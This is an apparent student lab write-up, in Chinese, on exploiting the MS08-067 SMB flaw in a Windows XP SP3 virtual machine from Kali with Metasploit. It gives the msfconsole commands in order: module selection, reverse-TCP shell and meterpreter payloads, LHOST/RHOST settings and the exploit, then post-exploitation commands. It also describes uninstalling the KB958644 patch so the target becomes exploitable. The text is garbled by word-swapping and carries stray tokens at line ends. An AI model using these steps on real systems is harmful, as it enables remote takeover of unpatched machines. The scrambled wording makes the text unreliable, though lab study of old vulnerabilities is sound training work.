MS08_067漏洞渗透攻击实践

MS08_067漏洞渗透攻击实践

实验前准备

一、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。shell

二、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,以后两台虚拟机就能够直接ping通。以下图:windows

若是ping不通,通常是ip地址不在同一个网段上,须要从新设置xp的ip地址,打开:控制面板->网络链接->右击本地链接选择属性->选择internet协议(TCP/IP)->属性,就能够编辑ip地址了。例如:kali ip是192.168.241.131,xp ip设置为:192.168.241.130。前三位同样,最后一位随便设置。api

MS08_067远程漏洞攻击实践:Shell

一、在kali终端中开启msfconsole。安全

二、输入命令search ms08_067,会显示出找到的渗透模块,以下图所示:网络

三、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。session

四、输入命令show payload会显示出有效的攻击载荷,以下图所示,咱们找到一个shell_reverse_tcp。tcp

五、命令show targets会显示出能够被攻击的靶机的操做系统型号,以下图所示:操作系统

六、使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。3d

七、输入命令show options显示咱们须要在攻击前须要设置的数据,以下图红框圈住的部分。code

八、输入命令

set LHOST "kali Ip" 

set RHOST "Win xp Ip"

并使用命令show options再次查看payload状态。

九、输入命令exploit开始攻击,以下图所示是正常攻击成功结果。

在kali上执行ipconfig/all获得以下图所示:

在win xp上执行一样的命令,以下图所示:

MS08_067远程漏洞攻击实践:meterpreter

一、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

二、设置payload:set payload windows/meterpreter/reverse_tcp

三、show options,查看须要设置的ip地址,以下图所示,是已经设置好的

四、成功攻击结果:

五、执行ifconfig,查看靶机地址:

六、ps查看进程:

七、meterpreter转shell:

实验中遇到的问题

一、在作实验的时候用老师的xp系统做为靶机,可是在exploit的时候显示以下:no session was created。

二、手动设置一个set session 1,结果仍是不成功。

三、在exploit前,使用check查看靶机状态,返回如下信息,代表目标主机是安全的,不能被攻击。

四、网上查到能够卸载ms08_067的补丁,即卸载KB958644,文件路径:c:/windows找到KB958644(这是个隐藏文件),打开卸载exe程序,以下:

五、重启后,仍是不能成功,最后找了一个英文版的win xp sp 3 ,才成功完成。

相关文章
相关标签/搜索